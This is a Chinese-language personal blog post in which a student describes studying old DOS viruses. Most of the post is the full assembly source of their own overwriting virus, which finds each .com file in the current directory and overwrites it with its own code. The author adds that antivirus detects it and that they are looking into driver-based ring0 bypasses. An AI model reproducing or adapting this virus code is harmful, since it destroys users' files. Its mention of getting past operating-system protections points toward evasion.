下载拉1000多个"史前时期"(82--98年左右)的小病毒 全汇编 (1K---200K) 看拉3个
其实很简单就是几个DOS中断(文件 磁盘操作相关)
自己试着写拉一个:将本目录的*.com(可以随便改想感染的类型)逐个写入指定长度的内容
源代码如下:
data_1e equ 9Eh seg_a segment byte publicassume cs:seg_a, ds:seg_a
org 100h COPYR proc far start: mov ah,4Eh mov cl,20h mov dx,offset data_3 int 21h loc_1: mov dx,data_1e mov ax,3D01h int 21h mov bx,ax mov dx,offset ds:[100h] mov cl,2Eh mov ah,40h int 21h mov ah,3Eh int 21h mov ah,4Fh int 21h jnc loc_1 int 20h data_3 db 2Ah ;*.com的ascii码(十六进制) db 2Eh, 43h, 4Fh, 4Dh, 00h COPYR endp seg_a ends end start
效果图看相册
我用的是诺顿 xp下能被检出 但是不能运行 会抛异常(XP下禁止中断,用驱动突破ring0级限制 我正在研究 还不会 :) )
正在下载98的镜象 用VPC虚上 程序在98上跑 就能运拉 我估计 呵呵
ps:我写博客的目的是督促自己 寒假学习一下 下学期就要去公司实习拉 别什么都忘拉
